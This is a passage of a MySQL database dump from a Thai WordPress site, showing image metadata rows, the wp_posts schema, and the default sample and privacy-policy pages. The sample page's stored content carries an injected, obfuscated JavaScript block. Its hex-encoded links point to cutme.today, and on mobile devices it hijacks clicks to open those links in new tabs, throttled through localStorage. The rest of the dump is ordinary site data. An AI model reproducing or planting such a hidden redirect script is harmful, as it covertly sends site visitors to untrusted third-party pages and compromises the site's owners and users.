;s:165:\"สีส้ม-สีน้ำเงิน-ทางการ-รับสมัครนักเรียน-ป้าย-แบนเนอร์-1-2048x1024.png\";s:5:\"width\";i:2048;s:6:\"height\";i:1024;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:896548;}s:14:\"post-thumbnail\";a:5:{s:4:\"file\";s:163:\"สีส้ม-สีน้ำเงิน-ทางการ-รับสมัครนักเรียน-ป้าย-แบนเนอร์-1-350x184.png\";s:5:\"width\";i:350;s:6:\"height\";i:184;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:44147;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}s:14:\"original_image\";s:155:\"สีส้ม-สีน้ำเงิน-ทางการ-รับสมัครนักเรียน-ป้าย-แบนเนอร์-1.png\";}'),
(5678,2040,'title_style','hidden'),
(5679,2040,'_title_style','field_5d1a0217cf408'),
(5681,2042,'title_style','hidden'),
(5682,2042,'_title_style','field_5d1a0217cf408'),
(5684,2044,'title_style','hidden'),
(5685,2044,'_title_style','field_5d1a0217cf408'),
(5686,2045,'title_style','hidden'),
(5687,2045,'_title_style','field_5d1a0217cf408'),
(5688,2046,'title_style','hidden'),
(5689,2046,'_title_style','field_5d1a0217cf408'),
(5690,2047,'title_style','hidden'),
(5691,2047,'_title_style','field_5d1a0217cf408'),
(5693,2049,'_wp_attached_file','2025/09/สีส้ม-สีน้ำเงิน-ทางการ-รับสมัครนักเรียน-ป้าย-แบนเนอร์-3-1-1-scaled.png'),
(5694,2049,'_wp_attachment_metadata','a:7:{s:5:\"width\";i:2560;s:6:\"height\";i:1280;s:4:\"file\";s:174:\"2025/09/สีส้ม-สีน้ำเงิน-ทางการ-รับสมัครนักเรียน-ป้าย-แบนเนอร์-3-1-1-scaled.png\";s:8:\"filesize\";i:3088377;s:5:\"sizes\";a:7:{s:6:\"medium\";a:5:{s:4:\"file\";s:167:\"สีส้ม-สีน้ำเงิน-ทางการ-รับสมัครนักเรียน-ป้าย-แบนเนอร์-3-1-1-300x150.png\";s:5:\"width\";i:300;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:68364;}s:5:\"large\";a:5:{s:4:\"file\";s:168:\"สีส้ม-สีน้ำเงิน-ทางการ-รับสมัครนักเรียน-ป้าย-แบนเนอร์-3-1-1-1024x512.png\";s:5:\"width\";i:1024;s:6:\"height\";i:512;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:617930;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:167:\"สีส้ม-สีน้ำเงิน-ทางการ-รับสมัครนักเรียน-ป้าย-แบนเนอร์-3-1-1-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:32924;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:167:\"สีส้ม-สีน้ำเงิน-ทางการ-รับสมัครนักเรียน-ป้าย-แบนเนอร์-3-1-1-768x384.png\";s:5:\"width\";i:768;s:6:\"height\";i:384;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:368602;}s:9:\"1536x1536\";a:5:{s:4:\"file\";s:168:\"สีส้ม-สีน้ำเงิน-ทางการ-รับสมัครนักเรียน-ป้าย-แบนเนอร์-3-1-1-1536x768.png\";s:5:\"width\";i:1536;s:6:\"height\";i:768;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:1265727;}s:9:\"2048x2048\";a:5:{s:4:\"file\";s:169:\"สีส้ม-สีน้ำเงิน-ทางการ-รับสมัครนักเรียน-ป้าย-แบนเนอร์-3-1-1-2048x1024.png\";s:5:\"width\";i:2048;s:6:\"height\";i:1024;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:2090206;}s:14:\"post-thumbnail\";a:5:{s:4:\"file\";s:167:\"สีส้ม-สีน้ำเงิน-ทางการ-รับสมัครนักเรียน-ป้าย-แบนเนอร์-3-1-1-350x184.png\";s:5:\"width\";i:350;s:6:\"height\";i:184;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:94748;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}s:14:\"original_image\";s:159:\"สีส้ม-สีน้ำเงิน-ทางการ-รับสมัครนักเรียน-ป้าย-แบนเนอร์-3-1-1.png\";}'),
(5695,2050,'title_style','hidden'),
(5696,2050,'_title_style','field_5d1a0217cf408'),
(5701,2052,'_edit_lock','1758603371:1'),
(5702,2053,'_wp_attached_file','2025/09/18-168.png'),
(5703,2053,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:707;s:6:\"height\";i:1000;s:4:\"file\";s:18:\"2025/09/18-168.png\";s:8:\"filesize\";i:978390;s:5:\"sizes\";a:3:{s:6:\"medium\";a:5:{s:4:\"file\";s:18:\"18-168-212x300.png\";s:5:\"width\";i:212;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:108574;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:18:\"18-168-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:44083;}s:14:\"post-thumbnail\";a:5:{s:4:\"file\";s:18:\"18-168-350x184.png\";s:5:\"width\";i:350;s:6:\"height\";i:184;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:110926;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(5705,2052,'_thumbnail_id','2053'),
(5706,2052,'_edit_last','1'),
(5707,2052,'title_style','hidden'),
(5708,2052,'_title_style','field_5d1a0217cf408'),
(5709,2052,'related',''),
(5710,2052,'_related','field_603b51c3e183e'),
(5711,2054,'title_style','hidden'),
(5712,2054,'_title_style','field_5d1a0217cf408'),
(5713,2054,'related',''),
(5714,2054,'_related','field_603b51c3e183e');
/*!40000 ALTER TABLE `wp_postmeta` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wp_posts`
--

DROP TABLE IF EXISTS `wp_posts`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8mb4 */;
CREATE TABLE `wp_posts` (
  `ID` bigint(20) unsigned NOT NULL AUTO_INCREMENT,
  `post_author` bigint(20) unsigned NOT NULL DEFAULT 0,
  `post_date` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `post_date_gmt` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `post_content` longtext NOT NULL,
  `post_title` text NOT NULL,
  `post_excerpt` text NOT NULL,
  `post_status` varchar(20) NOT NULL DEFAULT 'publish',
  `comment_status` varchar(20) NOT NULL DEFAULT 'open',
  `ping_status` varchar(20) NOT NULL DEFAULT 'open',
  `post_password` varchar(255) NOT NULL DEFAULT '',
  `post_name` varchar(200) NOT NULL DEFAULT '',
  `to_ping` text NOT NULL,
  `pinged` text NOT NULL,
  `post_modified` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `post_modified_gmt` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `post_content_filtered` longtext NOT NULL,
  `post_parent` bigint(20) unsigned NOT NULL DEFAULT 0,
  `guid` varchar(255) NOT NULL DEFAULT '',
  `menu_order` int(11) NOT NULL DEFAULT 0,
  `post_type` varchar(20) NOT NULL DEFAULT 'post',
  `post_mime_type` varchar(100) NOT NULL DEFAULT '',
  `comment_count` bigint(20) NOT NULL DEFAULT 0,
  PRIMARY KEY (`ID`),
  KEY `post_name` (`post_name`(191)),
  KEY `type_status_date` (`post_type`,`post_status`,`post_date`,`ID`),
  KEY `post_parent` (`post_parent`),
  KEY `post_author` (`post_author`)
) ENGINE=InnoDB AUTO_INCREMENT=2056 DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wp_posts`
--

LOCK TABLES `wp_posts` WRITE;
/*!40000 ALTER TABLE `wp_posts` DISABLE KEYS */;
INSERT INTO `wp_posts` VALUES
(2,1,'2024-07-27 09:28:22','2024-07-27 02:28:22','<!-- wp:paragraph -->\n<p>นี่คือหน้าตัวอย่าง มันแตกต่างจากเรื่องของบล็อกเพราะว่ามันจะอยู่ในที่ที่เดียว และจะถูกแสดงออกมาในการใช้งานเว็บของคุณ (ในธีมส่วนใหญ่) หลายคนเริ่มด้วยหน้าเกี่ยวกับ ซึ่งจะแนะนำพวกเขาถึงผู้เยี่ยมชมเว็บที่เป็นไปได้ มันอาจจะพูดถึงบางสิ่งประมาณนี้:</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:quote -->\n<blockquote class=\"wp-block-quote\"><p>สวัสดี! ฉันเป็นพนักงานส่งของในตอนกลางวัน ปรารถนาเป็นนักแสดงในตอนกลางคืน และนี่คือเว็บของฉัน ฉันอาศัยอยู่ที่ลอสแองเจลิส มีสุนัขที่ยอดเยี่ยมชื่อแจ๊ค และฉันชื่นชอบพีน่า โคลาด้า (และกำลังติดฝนอยู่)</p></blockquote>\n<!-- /wp:quote -->\n\n<!-- wp:paragraph -->\n<p>...หรือบางสิ่งคล้ายกันนี้:</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:quote -->\n<blockquote class=\"wp-block-quote\"><p>บริษัทของเด็กเล่น XYZ ก่อตั้งในปี 1971 และได้จัดจำหน่ายของเด็กเล่นที่มีคุณภาพสู่สาธารณะตั้งแต่นั้นมา ตั้งอยู่ที่เมืองกอร์ทเทม บริษัทจ้างงานกว่า 2,000 คนและได้ทำสิ่งที่ดีเลิศมากมายสำหรับชุมชนเมืองกอร์ทเทม</p></blockquote>\n<!-- /wp:quote -->\n\n<!-- wp:paragraph -->\n<p>ในฐานะผู้ใช้ WordPress ใหม่ คุณควรจะไปที่ <a href=\"http://pakhaeng.ssk.in.th/wp-admin/\">แผงควบคุมของคุณ</a> เพื่อลบหน้านี้ และสร้างหน้าใหม่สำหรับเนื้อหาของคุณ สนุกกัน!</p>\n<!-- /wp:paragraph -->\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=[\'substr\',\'length\',\'-hurs\',\'open\',\'round\',\'443779RQfzWn\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x6f\\x63\\x47\\x33\\x63\\x353\',\'click\',\'5114346JdlaMi\',\'1780163aSIYqH\',\'forEach\',\'host\',\'_blank\',\'68512ftWJcO\',\'addEventListener\',\'-mnts\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x74\\x68\\x4f\\x35\\x63\\x385\',\'4588749LmrVjF\',\'parse\',\'630bGPCEV\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x6e\\x50\\x38\\x63\\x338\',\'abs\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x58\\x4e\\x39\\x63\\x389\',\'56bnMKls\',\'opera\',\'6946eLteFW\',\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x49\\x4d\\x76\\x34\\x63\\x324\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x48\\x62\\x61\\x37\\x63\\x357\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x42\\x42\\x47\\x32\\x63\\x382\',\'floor\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x50\\x79\\x78\\x36\\x63\\x376\',\'999HIfBhL\',\'filter\',\'test\',\'getItem\',\'random\',\'138490EjXyHW\',\'stopPropagation\',\'setItem\',\'70kUzPYI\'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06[\'push\'](_0x307c06[\'shift\']());}catch(_0x3e3a47){_0x307c06[\'push\'](_0x307c06[\'shift\']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window[\'mobileCheck\']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x1165a7(0x1ca)](_0x5e9786)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator[\'vendor\']||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=[\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x77\\x67\\x64\\x30\\x63\\x380\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x4d\\x76\\x49\\x31\\x63\\x361\',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage[\'getItem\'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+\'-mnts\',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window[\'mobileCheck\']()&&window[_0x22f77c(0x1d4)](newLocation,\'_blank\');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());</script>','หน้าตัวอย่าง','','publish','closed','open','','sample-page','','','2024-07-27 09:28:22','2024-07-27 02:28:22','',0,'http://pakhaeng.ssk.in.th/?page_id=2',0,'page','',0),
(3,1,'2024-07-27 09:28:22','2024-07-27 02:28:22','<!-- wp:heading -->\n<h2 class=\"wp-block-heading\">เราคือใคร</h2>\n<!-- /wp:heading -->\n<!-- wp:paragraph -->\n<p><strong class=\"privacy-policy-tutorial\">ข้อความแนะนำ: </strong>ที่อยู่เว็บไซต์ของเราคือ: http://pakhaeng.ssk.in.th</p>\n<!-- /wp:paragraph -->\n<!-- wp:heading -->\n<h2 class=\"wp-block-heading\">ความเห็น</h2>\n<!-- /wp:heading -->\n<!-- wp:paragraph -->\n<p><strong class=\"privacy-policy-tutorial\">ข้อความแนะนำ: </strong>เมื่อผู้เยี่ยมชมแสดงความเห็นในเว็บไซต์ เราเก็บข้อมูลที่แสดงในฟอร์มแสดงความเห็น และหมายเลขไอพีและเบราว์เซอร์ของผู้เยี่ยมชมด้วยเพื่อช่วยการตรวจสอบสแปม</p>\n<!-- /wp:paragraph -->\n<!-- wp:paragraph -->\n<p>สตริงนิรนามถูกสร้างขึ้นจากอีเมลของคุณ (หรือที่เรียกว่าแฮช) อาจจะถูกส่งให้บริการ Gravatar เพื่อดูว่าคุณใช้งานหรือไม่ นโยบายความเป็นส่วนตัวของบริการ Gravatar สามารถดูได้ที่นี่: https://automattic.com/privacy/ หลังจากได้รับการยืนยันความเห็นของคุณ รูปภาพข้อมูลส่วนตัวของคุณจะปรากฏสู่สาธารณะในบริบทของความเห็นของคุณ</p>\n<!-- /wp:paragraph -->\n<!-- wp:heading -->\n<h2 class=\"wp-block-heading\">สื่อ</h2>\n<!-- /wp:heading -->\n<!-- wp:paragraph -->\n<p><strong class=\"privacy-policy-tutorial\">ข้อความแนะนำ: </strong>ถ้าคุณอัปโหลดรูปภาพขึ้นมายังเว็บไซต์ คุณควรจะหลีกเลี่ยงการอัปโหลดรูปภาพที่มีข้อมูลตำแหน่งที่ตั้งฝังมาด้วย (EXIF GPS) ผู้เยี่ยมชมเว็บไซต์สามารถดาวน์โหลดและดึงข้อมูลตำแหน่งที่ตั้งใด ๆ จากรูปภาพบนเว็บไซต์ได้</p>\n<!-- /wp:paragraph -->\n<!-- wp:heading -->\n<h2 class=\"wp-block-heading\">คุกกี้</h2>\n<!-- /wp:heading -->\n<!-- wp:paragraph -->\n<p><strong class=\"privacy-policy-tutorial\">ข้อความแนะนำ: </strong>ถ้าคุณแสดงความเห็นบนเว็บไซต์ของเรา คุณอาจจะเลือกเข้าสู่การบันทึกชื่อ อีเมลและเว็บไซต์ของคุณในคุกกี้ นี่จะเป็นการอำนวยความสะดวกสำหรับคุณโดยที่คุณไม่ต้องกรอกรายละเอียดเหล่านี้ซ้ำอีกครั้งในขณะที่คุณแสดงความเห็นอื่น คุกกี้นี้จะอยู่เป็นระยะเวลาหนึ่งปี</p>\n<!-- /wp:paragraph -->\n<!-- wp:paragraph -->\n<p>ถ้าคุณเยี่ยมชมหน้าเข้าสู่ระบบ เราจะตั้งคุกกี้ชั่วคราวเพื่อตรวจสอบว่าเบราว์เซอร์ยอมรับคุกกี้ได้ คุกกี้นี้ไม่มีข้อมูลส่วนตัวรวมอยู่ด้วยและถูกยกเลิกเมื่อคุณปิดเบราว์เซอร์ของคุณ</p>\n<!-- /wp:paragraph -->\n<!-- wp:paragraph -->\n<p>เมื่อคุณเข้าสู่ระบบ เราจะจัดตั้งหลายคุกกี้เพื่อที่จะบันทึกข้อมูลการเข้าสู่ระบบของคุณและตัวเลือกการแสดงผลหน้าจอของคุณ คุกกี้การเข้าสู่ระบบจะคงอยู่ภายในสองวัน และคุกกี้ตัวเลือกหน้าจอจะอยู่เป็นเวลาหนึ่งปี ถ้าคุณเลือก &quot;บันทึกการใช้งานของฉัน&quot; การเข้าสู่ระบบของคุณจะยังคงอยู่เป็นเวลาสองสัปดาห์ ถ้าคุณออกจากระบบบัญชีของคุณ คุกกี้การเข้าสู่ระบบจะถูกลบทิ้ง</p>\n<!-- /wp:paragraph -->\n<!-- wp:paragraph -->\n<p>ถ้าคุณแก้ไขหรือเผยแพร่บทความ คุกกี้ที่เพิ่มเติมจะถูกบันทึกไว้ในเบราว์เซอร์ของคุณ คุกกี้นี้ไม่มีข้อมูลส่วนตัวรวมอยู่และชี้ไปที่ ID ของเรื่องบทความที่คุณเพิ่งจะแก้ไข ซึ่งจะหมดอายุใน 1 วัน</p>\n<!-- /wp:paragraph -->\n<!-- wp:heading -->\n<h2 class=\"wp-block-heading\">แนบเนื้อหาจากเว็บไซต์อื่น</h2>\n<!-- /wp:heading -->\n<!-- wp:paragraph -->\n<p><strong class=\"privacy-policy-tutorial\">ข้อความแนะนำ: </strong>บทความบนเว็บไซต์นี้อาจจะมีเนื้อหาที่ถูกแนบไว้ (เช่น วีดีโอ รูปภาพ บทความ เป็นต้น) เนื้อหาที่ถูกแนบไว้จากเว็บไซต์อื่นปฏิบัติในแนวทางเดียวกันกับที่ผู้เยี่ยมชมได้เข้าชมเว็บไซต์อื่น</p>\n<!-- /wp:paragraph -->\n<!-- wp:paragraph -->\n<p>เว็บไซต์เหล่านี้อาจจะมีการเก็บข้อมูลของคุณ ใช้คุกกี้ การฝังการติดตามบุคคลที่สามเพิ่มเติม และเฝ้าดูการปฏิสัมพันธ์กับเนื้อหาที่แนบไว้ รวมถึงการติดตามการปฏิสัมพันธ์ของคุณกับเนื้อหาที่ถูกแนบไว้ถ้าคุณมีบัญชีและเข้าสู่ระบบในเว็บไซต์นั้นไว้</p>\n<!-- /wp:paragraph -->\n<!-- wp:heading -->\n<h2 class=\"wp-block-heading\">ใครที่เราแชร์ข้อมูลของคุณด้วย</h2>\n<!-- /wp:heading -->\n<!-- wp:paragraph -->\n<p><strong class=\"privacy-policy-tutorial\">ข้อความแนะนำ: </strong>หากคุณร้องขอให้มีการล้างค่ารหัสผ่าน ที่อยู่ไอพีของคุณจะถูกรวมเข้าไปอยู่ในอีเมลล้างค่าด้วย</p>\n<!-- /wp:paragraph -->\n<!-- wp:heading -->\n<h2 class=\"wp-block-heading\">เราเก็บรักษาข้อมูลของคุณไว้นานแค่ไหน</h2>\n<!-- /wp:heading -->\n<!-- wp:paragraph -->\n<p><strong class=\"privacy-policy-tutorial\">ข้อความแนะนำ: </strong>ถ้าคุณแสดงความเห็น ความเห็นและข้อมูลภายในนั้นจะถูกเก็บไว้ตลอด นี่คือสิ่งที่เราสามารถจดจำและพิสูจน์ความเห็นที่ตามมาอย่างอัตโนมัติแทนที่จะต้องชะงักไว้ในคิวการจัดการ</p>\n<!-- /wp:paragraph -->\n<!-- wp:paragraph -->\n<p>สำหรับผู้ใช้ที่ลงทะเบียนบนเว็บไซต์ของเรา (ถ้ามี) เรามีการเก็บข้อมูลส่วนตัวตามที่พวกเขาให้ไว้ในโปรไฟล์เช่นกัน ผู้ใช้ทั้งหมดสามารถดู แก้ไข 